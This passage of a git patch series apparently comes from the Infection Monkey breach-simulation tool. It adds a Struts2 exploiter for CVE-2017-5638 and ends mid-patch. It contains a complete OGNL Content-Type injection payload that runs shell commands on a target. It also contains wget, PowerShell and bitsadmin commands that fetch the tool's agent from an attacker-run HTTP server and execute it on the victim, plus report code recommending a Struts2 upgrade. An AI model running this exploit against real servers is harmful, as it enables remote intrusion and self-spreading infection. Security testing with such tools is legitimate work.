From 9a8a6c6e28b95c2a6f3d9e0fab57321a169636ca Mon Sep 17 00:00:00 2001 From: Vakaris Date: Tue, 19 Jun 2018 18:05:09 +0300 Subject: [PATCH 1/9] Now exploiting both win and linux. Also, added check if monkey is not already present --- infection_monkey/exploit/struts2.py | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 infection_monkey/exploit/struts2.py diff --git a/infection_monkey/exploit/struts2.py b/infection_monkey/exploit/struts2.py new file mode 100644 index 000000000..e69de29bb From 413bdd925447c5b919ce664f6d01d2801e014d6b Mon Sep 17 00:00:00 2001 From: Vakaris Date: Tue, 19 Jun 2018 18:08:52 +0300 Subject: [PATCH 2/9] Not yet functioning and tested, but most functions are done --- infection_monkey/config.py | 4 +- infection_monkey/example.conf | 3 +- infection_monkey/exploit/__init__.py | 1 + infection_monkey/exploit/struts2.py | 204 +++++++++++++++++++++++++++ monkey_island/cc/services/config.py | 10 +- 5 files changed, 218 insertions(+), 4 deletions(-) diff --git a/infection_monkey/config.py b/infection_monkey/config.py index f4ca4e89e..4e87243a8 100644 --- a/infection_monkey/config.py +++ b/infection_monkey/config.py @@ -7,7 +7,7 @@ from abc import ABCMeta from itertools import product from exploit import WmiExploiter, Ms08_067_Exploiter, SmbExploiter, RdpExploiter, SSHExploiter, ShellShockExploiter, \ - SambaCryExploiter, ElasticGroovyExploiter + SambaCryExploiter, ElasticGroovyExploiter, Struts2Exploiter from network import TcpScanner, PingScanner, SMBFinger, SSHFinger, HTTPFinger, MySQLFinger, ElasticFinger __author__ = 'itamar' @@ -148,7 +148,7 @@ class Configuration(object): finger_classes = [SMBFinger, SSHFinger, PingScanner, HTTPFinger, MySQLFinger, ElasticFinger] exploiter_classes = [SmbExploiter, WmiExploiter, # Windows exploits SSHExploiter, ShellShockExploiter, SambaCryExploiter, # Linux - ElasticGroovyExploiter, # multi + ElasticGroovyExploiter, Struts2Exploiter # multi ] # how many victims to look for in a single scan iteration diff --git a/infection_monkey/example.conf b/infection_monkey/example.conf index bc0156d8a..a6961331f 100644 --- a/infection_monkey/example.conf +++ b/infection_monkey/example.conf @@ -36,7 +36,8 @@ "WmiExploiter", "ShellShockExploiter", "ElasticGroovyExploiter", - "SambaCryExploiter" + "SambaCryExploiter", + "Struts2Exploiter" ], "finger_classes": [ "SSHFinger", diff --git a/infection_monkey/exploit/__init__.py b/infection_monkey/exploit/__init__.py index a05f5b079..f2d5d0c5b 100644 --- a/infection_monkey/exploit/__init__.py +++ b/infection_monkey/exploit/__init__.py @@ -41,3 +41,4 @@ from sshexec import SSHExploiter from shellshock import ShellShockExploiter from sambacry import SambaCryExploiter from elasticgroovy import ElasticGroovyExploiter +from struts2 import Struts2Exploiter diff --git a/infection_monkey/exploit/struts2.py b/infection_monkey/exploit/struts2.py index e69de29bb..f3a819169 100644 --- a/infection_monkey/exploit/struts2.py +++ b/infection_monkey/exploit/struts2.py @@ -0,0 +1,204 @@ +""" + Implementation is based on Struts2 jakarta multiparser RCE exploit ( CVE-2017-5638 ) + code used is from https://www.exploit-db.com/exploits/41570/ + Vulnerable struts2 versions <=2.3.31 and <=2.5.10 +""" +import urllib2 +import httplib +import unicodedata +import re + +from network.tools import check_tcp_ports +import logging +from exploit import HostExploiter +from exploit.tools import get_target_monkey, get_monkey_depth +from tools import build_monkey_commandline, HTTPTools + +__author__ = "VakarisZ" + +LOG = logging.getLogger(__name__) + +ID_STRING = "M0NK3YSTRUTS2" +MONKEY_ARG = "m0nk3y" +# Commands used for downloading monkeys +POWERSHELL_HTTP = "powershell -NoLogo -Command \"Invoke-WebRequest -Uri \\\'%%(http_path)s\\\' -OutFile \\\'%%(monkey_path)s\\\' -UseBasicParsing; %%(monkey_path)s %s %%(parameters)s\"" % (MONKEY_ARG, ) +WGET_HTTP = "wget -O %%(monkey_path)s %%(http_path)s && sudo chmod a+rwx %%(monkey_path)s && %%(monkey_path)s %s %%(parameters)s" % (MONKEY_ARG, ) +# Command used to check whether host is vulnerable +CHECK_COMMAND = "echo %s" % ID_STRING +# Commands used to check for architecture +CHECK_WINDOWS = "%s && wmic os get osarchitecture" % ID_STRING +CHECK_LINUX = "%s && lscpu" % ID_STRING +# Commands used to check if monkeys already exists +EXISTS = "ls %s" + +WEB_PORTS = [80, 443, 8080] +# Timeouts if the payload is wrong +DOWNLOAD_TIMEOUT = 30 +# This is set so that we don't have to wait for monkeys' output (in seconds) +RESPONSE_TIMEOUT = 1 + + +class Struts2Exploiter(HostExploiter): + _TARGET_OS_TYPE = ['linux', 'windows'] + + def __init__(self, host): + super(Struts2Exploiter, self).__init__(host) + self._config = __import__('config').WormConfiguration + self.skip_exist = self._config.skip_exploit_if_file_exist + + def exploit_host(self): + # TODO add skip if file exists + # Initializing vars for convenience + ports, _ = check_tcp_ports(self.host.ip_addr, WEB_PORTS) + dropper_path_linux = self._config.dropper_target_path_linux + dropper_path_win_32 = self._config.dropper_target_path_win_32 + dropper_path_win_64 = self._config.dropper_target_path_win_64 + + if not ports: + LOG.info("All web ports are closed on %r, skipping", self.host) + return False + + for port in ports: + if port == 443: + current_host = "https://%s:%d" % (self.host.ip_addr, port) + else: + # TODO remove struts from url + current_host = "http://%s:%d/struts" % (self.host.ip_addr, port) + # Get full URL + current_host = self.get_redirected(current_host) + # Get os architecture so that we don't have to update monkey + + LOG.info("Trying to exploit with struts2") + # Check if host is vulnerable and get host os architecture + if 'linux' in self.host.os['type']: + host_arch = Struts2Exploiter.try_exploit_linux(current_host) + else: + host_arch = Struts2Exploiter.try_exploit_windows(current_host) + + if host_arch: + self.host.os['machine'] = host_arch + + if current_host and host_arch: + LOG.info("Host is exploitable with struts2 RCE vulnerability") + src_path = get_target_monkey(self.host) + if not src_path: + LOG.info("Can't find suitable monkey executable for host %r", self.host) + return False + # create server for http download. + http_path, http_thread = HTTPTools.create_transfer(self.host, src_path) + if not http_path: + LOG.debug("Exploiter Struts2 failed, http transfer creation failed.") + return False + LOG.info("Started http server on %s", http_path) + + cmdline = build_monkey_commandline(self.host, get_monkey_depth() - 1) + + # Form command according to os + if 'linux' in self.host.os['type']: + if self.skip_exist and (self.check_remote_file(current_host, dropper_path_linux)): + return True + command = WGET_HTTP % {'monkey_path': dropper_path_linux, + 'http_path': http_path, 'parameters': cmdline} + else: + if self.skip_exist and (self.check_remote_file(current_host, dropper_path_win_32) + or self.check_remote_file(current_host, dropper_path_win_64)): + return True + command = POWERSHELL_HTTP % {'monkey_path': re.escape(dropper_path_win_32), + 'http_path': http_path, 'parameters': cmdline} + + self.exploit(current_host, command) + + http_thread.join(DOWNLOAD_TIMEOUT) + http_thread.stop() + LOG.info("Struts2 exploit attempt finished") + + return True + + return False + + def check_remote_file(self, host, path): + command = EXISTS % path + resp = self.exploit(host, command) + if 'No such file' in resp: + return False + else: + LOG.info("Host %s was already infected under the current configuration, done" % self.host) + return True + + @staticmethod + def try_exploit_windows(url): + resp = Struts2Exploiter.exploit(url, CHECK_WINDOWS) + if resp and ID_STRING in resp: + if "64-bit" in resp: + return "64" + else: + return "32" + else: + return False + + @staticmethod + def try_exploit_linux(url): + resp = Struts2Exploiter.exploit(url, CHECK_LINUX) + if resp and ID_STRING in resp: + if "x86_64" in resp: + return "64" + else: + return "32" + else: + return False + + @staticmethod + def get_redirected(url): + # Returns false if url is not right + headers = {'User-Agent': 'Mozilla/5.0'} + request = urllib2.Request(url, headers=headers) + try: + return urllib2.urlopen(request).geturl() + except urllib2.URLError: + return False + + @staticmethod + def exploit(url, cmd, timeout=None): + """ + :param url: Full url to send request to + :param cmd: Code to try and execute on host + :param timeout: How long to wait for response in seconds(if monkey is executed + it's better not to wait it's whole output + :return: response + """ + page = "" + + payload = "%{(#_='multipart/form-data')." + payload += "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)." + payload += "(#_memberAccess?" + payload += "(#_memberAccess=#dm):" + payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])." + payload += "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))." + payload += "(#ognlUtil.getExcludedPackageNames().clear())." + payload += "(#ognlUtil.getExcludedClasses().clear())." + payload += "(#context.setMemberAccess(#dm))))." + payload += "(#cmd='%s')." % cmd + payload += "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))." + payload += "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))." + payload += "(#p=new java.lang.ProcessBuilder(#cmds))." + payload += "(#p.redirectErrorStream(true)).(#process=#p.start())." + payload += "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))." + payload += "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))." + payload += "(#ros.flush())}" + # Turns payload ascii just for consistency + if isinstance(payload, unicode): + payload = unicodedata.normalize('NFKD', payload).encode('ascii', 'ignore') + headers = {'User-Agent': 'Mozilla/5.0', 'Content-Type': payload} + try: + request = urllib2.Request(url, headers=headers) + # Timeout added or else we would wait for all monkeys' output + page = urllib2.urlopen(request, timeout=timeout).read() + except AttributeError: + # If url does not exist + return False + except httplib.IncompleteRead, e: + page = e.partial + except Exception: + LOG.info("Request timed out, because monkey is still running on remote host") + + return page diff --git a/monkey_island/cc/services/config.py b/monkey_island/cc/services/config.py index 390968a86..c3534c95c 100644 --- a/monkey_island/cc/services/config.py +++ b/monkey_island/cc/services/config.py @@ -80,6 +80,13 @@ SCHEMA = { ], "title": "ElasticGroovy Exploiter" }, + { + "type": "string", + "enum": [ + "Struts2Exploiter" + ], + "title": "Struts2 Exploiter" + } ] }, "finger_classes": { @@ -609,7 +616,8 @@ SCHEMA = { "SSHExploiter", "ShellShockExploiter", "SambaCryExploiter", - "ElasticGroovyExploiter" + "ElasticGroovyExploiter", + "Struts2Exploiter" ], "description": "Determines which exploits to use. " + WARNING_SIGN From 2d27972e7ed4082bfbad696f0d02d97ca0fe79a7 Mon Sep 17 00:00:00 2001 From: Vakaris Date: Wed, 20 Jun 2018 16:58:20 +0300 Subject: [PATCH 3/9] Struts exploitation working, and tested with win-64 and ubuntu --- infection_monkey/exploit/struts2.py | 154 +++++++++++------- monkey_island/cc/resources/monkey_download.py | 15 ++ 2 files changed, 112 insertions(+), 57 deletions(-) diff --git a/infection_monkey/exploit/struts2.py b/infection_monkey/exploit/struts2.py index f3a819169..be8ba8f0f 100644 --- a/infection_monkey/exploit/struts2.py +++ b/infection_monkey/exploit/struts2.py @@ -23,11 +23,9 @@ MONKEY_ARG = "m0nk3y" # Commands used for downloading monkeys POWERSHELL_HTTP = "powershell -NoLogo -Command \"Invoke-WebRequest -Uri \\\'%%(http_path)s\\\' -OutFile \\\'%%(monkey_path)s\\\' -UseBasicParsing; %%(monkey_path)s %s %%(parameters)s\"" % (MONKEY_ARG, ) WGET_HTTP = "wget -O %%(monkey_path)s %%(http_path)s && sudo chmod a+rwx %%(monkey_path)s && %%(monkey_path)s %s %%(parameters)s" % (MONKEY_ARG, ) -# Command used to check whether host is vulnerable -CHECK_COMMAND = "echo %s" % ID_STRING # Commands used to check for architecture -CHECK_WINDOWS = "%s && wmic os get osarchitecture" % ID_STRING -CHECK_LINUX = "%s && lscpu" % ID_STRING +CHECK_WINDOWS = "echo %s && wmic os get osarchitecture" % ID_STRING +CHECK_LINUX = "echo %s && lscpu" % ID_STRING # Commands used to check if monkeys already exists EXISTS = "ls %s" @@ -47,7 +45,6 @@ class Struts2Exploiter(HostExploiter): self.skip_exist = self._config.skip_exploit_if_file_exist def exploit_host(self): - # TODO add skip if file exists # Initializing vars for convenience ports, _ = check_tcp_ports(self.host.ip_addr, WEB_PORTS) dropper_path_linux = self._config.dropper_target_path_linux @@ -65,56 +62,15 @@ class Struts2Exploiter(HostExploiter): # TODO remove struts from url current_host = "http://%s:%d/struts" % (self.host.ip_addr, port) # Get full URL - current_host = self.get_redirected(current_host) + url = self.get_redirected(current_host) # Get os architecture so that we don't have to update monkey LOG.info("Trying to exploit with struts2") # Check if host is vulnerable and get host os architecture if 'linux' in self.host.os['type']: - host_arch = Struts2Exploiter.try_exploit_linux(current_host) + return self.exploit_linux(url, dropper_path_linux) else: - host_arch = Struts2Exploiter.try_exploit_windows(current_host) - - if host_arch: - self.host.os['machine'] = host_arch - - if current_host and host_arch: - LOG.info("Host is exploitable with struts2 RCE vulnerability") - src_path = get_target_monkey(self.host) - if not src_path: - LOG.info("Can't find suitable monkey executable for host %r", self.host) - return False - # create server for http download. - http_path, http_thread = HTTPTools.create_transfer(self.host, src_path) - if not http_path: - LOG.debug("Exploiter Struts2 failed, http transfer creation failed.") - return False - LOG.info("Started http server on %s", http_path) - - cmdline = build_monkey_commandline(self.host, get_monkey_depth() - 1) - - # Form command according to os - if 'linux' in self.host.os['type']: - if self.skip_exist and (self.check_remote_file(current_host, dropper_path_linux)): - return True - command = WGET_HTTP % {'monkey_path': dropper_path_linux, - 'http_path': http_path, 'parameters': cmdline} - else: - if self.skip_exist and (self.check_remote_file(current_host, dropper_path_win_32) - or self.check_remote_file(current_host, dropper_path_win_64)): - return True - command = POWERSHELL_HTTP % {'monkey_path': re.escape(dropper_path_win_32), - 'http_path': http_path, 'parameters': cmdline} - - self.exploit(current_host, command) - - http_thread.join(DOWNLOAD_TIMEOUT) - http_thread.stop() - LOG.info("Struts2 exploit attempt finished") - - return True - - return False + return self.exploit_windows(url, [dropper_path_win_32, dropper_path_win_64]) def check_remote_file(self, host, path): command = EXISTS % path @@ -125,8 +81,92 @@ class Struts2Exploiter(HostExploiter): LOG.info("Host %s was already infected under the current configuration, done" % self.host) return True + def exploit_linux(self, url, dropper_path): + host_arch = Struts2Exploiter.check_exploit_linux(url) + if host_arch: + self.host.os['machine'] = host_arch + if url and host_arch: + LOG.info("Host is exploitable with struts2 RCE vulnerability") + # If monkey already exists and option not to exploit in that case is selected + if self.skip_exist and (self.check_remote_file(url, dropper_path)): + return True + + src_path = get_target_monkey(self.host) + if not src_path: + LOG.info("Can't find suitable monkey executable for host %r", self.host) + return False + # create server for http download. + http_path, http_thread = HTTPTools.create_transfer(self.host, src_path) + if not http_path: + LOG.debug("Exploiter Struts2 failed, http transfer creation failed.") + return False + LOG.info("Started http server on %s", http_path) + + cmdline = build_monkey_commandline(self.host, get_monkey_depth() - 1) + + command = WGET_HTTP % {'monkey_path': dropper_path, + 'http_path': http_path, 'parameters': cmdline} + + self.exploit(url, command, RESPONSE_TIMEOUT) + + http_thread.join(DOWNLOAD_TIMEOUT) + http_thread.stop() + LOG.info("Struts2 exploit attempt finished") + + return True + + return False + + def exploit_windows(self, url, dropper_paths): + """ + :param url: Where to send malicious request + :param dropper_paths: [0]-monkey-windows-32.bat, [1]-monkey-windows-64.bat + :return: Bool. Successfully exploited or not + """ + host_arch = Struts2Exploiter.check_exploit_windows(url) + if host_arch: + self.host.os['machine'] = host_arch + if url and host_arch: + LOG.info("Host is exploitable with struts2 RCE vulnerability") + # If monkey already exists and option not to exploit in that case is selected + if self.skip_exist: + for dropper_path in dropper_paths: + if self.check_remote_file(url, dropper_path): + return True + + src_path = get_target_monkey(self.host) + if not src_path: + LOG.info("Can't find suitable monkey executable for host %r", self.host) + return False + # Select the dir and name for monkey on the host + if "windows-32" in src_path: + dropper_path = dropper_paths[0] + else: + dropper_path = dropper_paths[1] + # create server for http download. + http_path, http_thread = HTTPTools.create_transfer(self.host, src_path) + if not http_path: + LOG.debug("Exploiter Struts2 failed, http transfer creation failed.") + return False + LOG.info("Started http server on %s", http_path) + + cmdline = build_monkey_commandline(self.host, get_monkey_depth() - 1) + + command = POWERSHELL_HTTP % {'monkey_path': re.sub(r"\\", r"\\\\", dropper_path), + 'http_path': http_path, 'parameters': cmdline} + # TODO Add timeout + self.exploit(url, command) + + http_thread.join(DOWNLOAD_TIMEOUT) + http_thread.stop() + LOG.info("Struts2 exploit attempt finished") + + return True + + return False + @staticmethod - def try_exploit_windows(url): + def check_exploit_windows(url): resp = Struts2Exploiter.exploit(url, CHECK_WINDOWS) if resp and ID_STRING in resp: if "64-bit" in resp: @@ -137,13 +177,13 @@ class Struts2Exploiter(HostExploiter): return False @staticmethod - def try_exploit_linux(url): + def check_exploit_linux(url): resp = Struts2Exploiter.exploit(url, CHECK_LINUX) if resp and ID_STRING in resp: - if "x86_64" in resp: - return "64" - else: - return "32" + # Pulls architecture string + arch = re.search('(?<=Architecture:)\s+(\w+)', resp) + arch = arch.group(1) + return arch else: return False @@ -162,8 +202,8 @@ class Struts2Exploiter(HostExploiter): """ :param url: Full url to send request to :param cmd: Code to try and execute on host - :param timeout: How long to wait for response in seconds(if monkey is executed - it's better not to wait it's whole output + :param timeout: How long to wait for response in seconds(if monkey is being executed + it's better not to wait it's whole output). By default we wait. :return: response """ page = "" diff --git a/monkey_island/cc/resources/monkey_download.py b/monkey_island/cc/resources/monkey_download.py index 25e67fdb2..acf92b558 100644 --- a/monkey_island/cc/resources/monkey_download.py +++ b/monkey_island/cc/resources/monkey_download.py @@ -21,6 +21,11 @@ MONKEY_DOWNLOADS = [ 'machine': 'i686', 'filename': 'monkey-linux-32', }, + { + 'type': 'linux', + 'machine': 'i386', + 'filename': 'monkey-linux-32', + }, { 'type': 'linux', 'filename': 'monkey-linux-64', @@ -35,6 +40,16 @@ MONKEY_DOWNLOADS = [ 'machine': 'amd64', 'filename': 'monkey-windows-64.exe', }, + { + 'type': 'windows', + 'machine': '64', + 'filename': 'monkey-windows-64.exe', + }, + { + 'type': 'windows', + 'machine': '32', + 'filename': 'monkey-windows-32.exe', + }, { 'type': 'windows', 'filename': 'monkey-windows-32.exe', From ef6c512ea9ef8210cd7df7294fbb69f0790ab4c6 Mon Sep 17 00:00:00 2001 From: Vakaris Date: Wed, 20 Jun 2018 22:35:18 +0300 Subject: [PATCH 4/9] Finished up exploitation and added reporting --- infection_monkey/exploit/struts2.py | 7 ++--- monkey_island/cc/services/report.py | 11 +++++++ .../cc/ui/src/components/pages/ReportPage.js | 29 +++++++++++++++++-- 3 files changed, 41 insertions(+), 6 deletions(-) diff --git a/infection_monkey/exploit/struts2.py b/infection_monkey/exploit/struts2.py index be8ba8f0f..5bd26fbb7 100644 --- a/infection_monkey/exploit/struts2.py +++ b/infection_monkey/exploit/struts2.py @@ -59,8 +59,7 @@ class Struts2Exploiter(HostExploiter): if port == 443: current_host = "https://%s:%d" % (self.host.ip_addr, port) else: - # TODO remove struts from url - current_host = "http://%s:%d/struts" % (self.host.ip_addr, port) + current_host = "http://%s:%d" % (self.host.ip_addr, port) # Get full URL url = self.get_redirected(current_host) # Get os architecture so that we don't have to update monkey @@ -154,8 +153,8 @@ class Struts2Exploiter(HostExploiter): command = POWERSHELL_HTTP % {'monkey_path': re.sub(r"\\", r"\\\\", dropper_path), 'http_path': http_path, 'parameters': cmdline} - # TODO Add timeout - self.exploit(url, command) + + self.exploit(url, command, RESPONSE_TIMEOUT) http_thread.join(DOWNLOAD_TIMEOUT) http_thread.stop() diff --git a/monkey_island/cc/services/report.py b/monkey_island/cc/services/report.py index 13b52422c..369b29c25 100644 --- a/monkey_island/cc/services/report.py +++ b/monkey_island/cc/services/report.py @@ -30,6 +30,7 @@ class ReportService: 'ElasticGroovyExploiter': 'Elastic Groovy Exploiter', 'Ms08_067_Exploiter': 'Conficker Exploiter', 'ShellShockExploiter': 'ShellShock Exploiter', + 'Struts2Exploiter': 'Struts2 Exploiter' } class ISSUES_DICT(Enum): @@ -41,6 +42,7 @@ class ReportService: CONFICKER = 5 AZURE = 6 STOLEN_SSH_KEYS = 7 + STRUTS2 = 8 class WARNINGS_DICT(Enum): CROSS_SEGMENT = 0 @@ -290,6 +292,12 @@ class ReportService: processed_exploit['paths'] = ['/' + url.split(':')[2].split('/')[1] for url in urls] return processed_exploit + @staticmethod + def process_struts2_exploit(exploit): + processed_exploit = ReportService.process_general_exploit(exploit) + processed_exploit['type'] = 'struts2' + return processed_exploit + @staticmethod def process_exploit(exploit): exploiter_type = exploit['data']['exploiter'] @@ -302,6 +310,7 @@ class ReportService: 'ElasticGroovyExploiter': ReportService.process_elastic_exploit, 'Ms08_067_Exploiter': ReportService.process_conficker_exploit, 'ShellShockExploiter': ReportService.process_shellshock_exploit, + 'Struts2Exploiter': ReportService.process_struts2_exploit } return EXPLOIT_PROCESS_FUNCTION_DICT[exploiter_type](exploit) @@ -419,6 +428,8 @@ class ReportService: issues_byte_array[ReportService.ISSUES_DICT.AZURE.value] = True elif issue['type'] == 'ssh_key': issues_byte_array[ReportService.ISSUES_DICT.STOLEN_SSH_KEYS.value] = True + elif issue['type'] == 'struts2': + issues_byte_array[ReportService.ISSUES_DICT.STRUTS2.value] = True elif issue['type'].endswith('_password') and issue['password'] in config_passwords and \ issue['username'] in config_users or issue['type'] == 'ssh': issues_byte_array[ReportService.ISSUES_DICT.WEAK_PASSWORD.value] = True diff --git a/monkey_island/cc/ui/src/components/pages/ReportPage.js b/monkey_island/cc/ui/src/components/pages/ReportPage.js index f018254b0..2a02a092d 100644 --- a/monkey_island/cc/ui/src/components/pages/ReportPage.js +++ b/monkey_island/cc/ui/src/components/pages/ReportPage.js @@ -23,7 +23,8 @@ class ReportPageComponent extends AuthComponent { SHELLSHOCK: 4, CONFICKER: 5, AZURE: 6, - STOLEN_SSH_KEYS: 7 + STOLEN_SSH_KEYS: 7, + STRUTS2: 8 }; Warning = @@ -321,7 +322,10 @@ class ReportPageComponent extends AuthComponent {
  • Azure machines expose plaintext passwords. (More info)
    • : null} - + {this.state.report.overview.issues[this.Issue.STRUTS2] ? +
  • Struts2 servers are vulnerable to remote code execution. ( + CVE-2017-5638)
    • : null } : @@ -671,6 +675,24 @@ class ReportPageComponent extends AuthComponent { ); } + generateStruts2Issue(issue) { + return ( +
  • + Upgrade Struts2 to version 2.3.32 or 2.5.10.1 or any later versions. + + Struts2 server at {issue.machine} ({issue.ip_address}) is vulnerable to remote code execution attack. +
    + The attack was made possible because the server is using an old version of Jakarta based file upload + Multipart parser. For possible work-arounds and more info read here. +     +
    • + ); + } + generateIssue = (issue) => { @@ -718,6 +740,9 @@ class ReportPageComponent extends AuthComponent { case 'azure_password': data = this.generateAzureIssue(issue); break; + case 'struts2': + data = this.generateStruts2Issue(issue); + break; } return data; }; From 208411d6fc2d83feeb90e5e3a1f55b5ec5dfbb5f Mon Sep 17 00:00:00 2001 From: Vakaris Date: Thu, 21 Jun 2018 00:10:56 +0300 Subject: [PATCH 5/9] Cosmetic changes --- infection_monkey/exploit/struts2.py | 8 +++----- 1 file changed, 3 insertions(+), 5 deletions(-) diff --git a/infection_monkey/exploit/struts2.py b/infection_monkey/exploit/struts2.py index 5bd26fbb7..6ed5a51ef 100644 --- a/infection_monkey/exploit/struts2.py +++ b/infection_monkey/exploit/struts2.py @@ -30,9 +30,8 @@ CHECK_LINUX = "echo %s && lscpu" % ID_STRING EXISTS = "ls %s" WEB_PORTS = [80, 443, 8080] -# Timeouts if the payload is wrong DOWNLOAD_TIMEOUT = 30 -# This is set so that we don't have to wait for monkeys' output (in seconds) +# In seconds. This is set so that we don't have to wait for monkeys' output. RESPONSE_TIMEOUT = 1 @@ -62,8 +61,6 @@ class Struts2Exploiter(HostExploiter): current_host = "http://%s:%d" % (self.host.ip_addr, port) # Get full URL url = self.get_redirected(current_host) - # Get os architecture so that we don't have to update monkey - LOG.info("Trying to exploit with struts2") # Check if host is vulnerable and get host os architecture if 'linux' in self.host.os['type']: @@ -87,7 +84,7 @@ class Struts2Exploiter(HostExploiter): if url and host_arch: LOG.info("Host is exploitable with struts2 RCE vulnerability") # If monkey already exists and option not to exploit in that case is selected - if self.skip_exist and (self.check_remote_file(url, dropper_path)): + if self.skip_exist and self.check_remote_file(url, dropper_path): return True src_path = get_target_monkey(self.host) @@ -194,6 +191,7 @@ class Struts2Exploiter(HostExploiter): try: return urllib2.urlopen(request).geturl() except urllib2.URLError: + LOG.error("Can't reach struts2 server") return False @staticmethod From 7ce790affa5cceaf2c2b1a7274e7163820297d82 Mon Sep 17 00:00:00 2001 From: Vakaris Date: Fri, 22 Jun 2018 14:55:52 +0300 Subject: [PATCH 6/9] Some notes fixed --- infection_monkey/exploit/struts2.py | 100 +++++++++++++++------------- infection_monkey/model/__init__.py | 10 +++ 2 files changed, 63 insertions(+), 47 deletions(-) diff --git a/infection_monkey/exploit/struts2.py b/infection_monkey/exploit/struts2.py index 6ed5a51ef..bec717028 100644 --- a/infection_monkey/exploit/struts2.py +++ b/infection_monkey/exploit/struts2.py @@ -8,31 +8,19 @@ import httplib import unicodedata import re -from network.tools import check_tcp_ports import logging from exploit import HostExploiter from exploit.tools import get_target_monkey, get_monkey_depth from tools import build_monkey_commandline, HTTPTools +from model import CHECK_LINUX, CHECK_WINDOWS, POWERSHELL_HTTP, WGET_HTTP, EXISTS, ID_STRING, DROPPER_ARG __author__ = "VakarisZ" LOG = logging.getLogger(__name__) -ID_STRING = "M0NK3YSTRUTS2" -MONKEY_ARG = "m0nk3y" -# Commands used for downloading monkeys -POWERSHELL_HTTP = "powershell -NoLogo -Command \"Invoke-WebRequest -Uri \\\'%%(http_path)s\\\' -OutFile \\\'%%(monkey_path)s\\\' -UseBasicParsing; %%(monkey_path)s %s %%(parameters)s\"" % (MONKEY_ARG, ) -WGET_HTTP = "wget -O %%(monkey_path)s %%(http_path)s && sudo chmod a+rwx %%(monkey_path)s && %%(monkey_path)s %s %%(parameters)s" % (MONKEY_ARG, ) -# Commands used to check for architecture -CHECK_WINDOWS = "echo %s && wmic os get osarchitecture" % ID_STRING -CHECK_LINUX = "echo %s && lscpu" % ID_STRING -# Commands used to check if monkeys already exists -EXISTS = "ls %s" +DOWNLOAD_TIMEOUT = 300 -WEB_PORTS = [80, 443, 8080] -DOWNLOAD_TIMEOUT = 30 -# In seconds. This is set so that we don't have to wait for monkeys' output. -RESPONSE_TIMEOUT = 1 +RDP_CMDLINE_HTTP_BITS = 'bitsadmin /transfer Update /download /priority high %%(http_path)s %%(monkey_path)s&&start /b %%(monkey_path)s %s %%(parameters)s' % (DROPPER_ARG, ) class Struts2Exploiter(HostExploiter): @@ -42,23 +30,24 @@ class Struts2Exploiter(HostExploiter): super(Struts2Exploiter, self).__init__(host) self._config = __import__('config').WormConfiguration self.skip_exist = self._config.skip_exploit_if_file_exist + self.HTTP = [str(port) for port in self._config.HTTP_PORTS] def exploit_host(self): - # Initializing vars for convenience - ports, _ = check_tcp_ports(self.host.ip_addr, WEB_PORTS) dropper_path_linux = self._config.dropper_target_path_linux dropper_path_win_32 = self._config.dropper_target_path_win_32 dropper_path_win_64 = self._config.dropper_target_path_win_64 + ports = self.get_exploitable_ports(self.host, self.HTTP, ["http"]) + if not ports: LOG.info("All web ports are closed on %r, skipping", self.host) return False for port in ports: - if port == 443: - current_host = "https://%s:%d" % (self.host.ip_addr, port) + if port[1]: + current_host = "https://%s:%s" % (self.host.ip_addr, port[0]) else: - current_host = "http://%s:%d" % (self.host.ip_addr, port) + current_host = "http://%s:%s" % (self.host.ip_addr, port[0]) # Get full URL url = self.get_redirected(current_host) LOG.info("Trying to exploit with struts2") @@ -103,7 +92,7 @@ class Struts2Exploiter(HostExploiter): command = WGET_HTTP % {'monkey_path': dropper_path, 'http_path': http_path, 'parameters': cmdline} - self.exploit(url, command, RESPONSE_TIMEOUT) + self.exploit(url, command) http_thread.join(DOWNLOAD_TIMEOUT) http_thread.stop() @@ -127,7 +116,7 @@ class Struts2Exploiter(HostExploiter): # If monkey already exists and option not to exploit in that case is selected if self.skip_exist: for dropper_path in dropper_paths: - if self.check_remote_file(url, dropper_path): + if self.check_remote_file(url, re.sub(r"\\", r"\\\\", dropper_path)): return True src_path = get_target_monkey(self.host) @@ -151,7 +140,13 @@ class Struts2Exploiter(HostExploiter): command = POWERSHELL_HTTP % {'monkey_path': re.sub(r"\\", r"\\\\", dropper_path), 'http_path': http_path, 'parameters': cmdline} - self.exploit(url, command, RESPONSE_TIMEOUT) + backup_command = RDP_CMDLINE_HTTP_BITS % {'monkey_path': re.sub(r"\\", r"\\\\", dropper_path), + 'http_path': http_path, 'parameters': cmdline} + + resp = self.exploit(url, command) + + if 'powershell is not recognized' in resp: + self.exploit(url, backup_command) http_thread.join(DOWNLOAD_TIMEOUT) http_thread.stop() @@ -195,33 +190,31 @@ class Struts2Exploiter(HostExploiter): return False @staticmethod - def exploit(url, cmd, timeout=None): + def exploit(url, cmd): """ :param url: Full url to send request to :param cmd: Code to try and execute on host - :param timeout: How long to wait for response in seconds(if monkey is being executed - it's better not to wait it's whole output). By default we wait. :return: response """ page = "" - payload = "%{(#_='multipart/form-data')." - payload += "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)." - payload += "(#_memberAccess?" - payload += "(#_memberAccess=#dm):" - payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])." - payload += "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))." - payload += "(#ognlUtil.getExcludedPackageNames().clear())." - payload += "(#ognlUtil.getExcludedClasses().clear())." - payload += "(#context.setMemberAccess(#dm))))." - payload += "(#cmd='%s')." % cmd - payload += "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))." - payload += "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))." - payload += "(#p=new java.lang.ProcessBuilder(#cmds))." - payload += "(#p.redirectErrorStream(true)).(#process=#p.start())." - payload += "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))." - payload += "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))." - payload += "(#ros.flush())}" + payload = "%%{(#_='multipart/form-data')." \ + "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)." 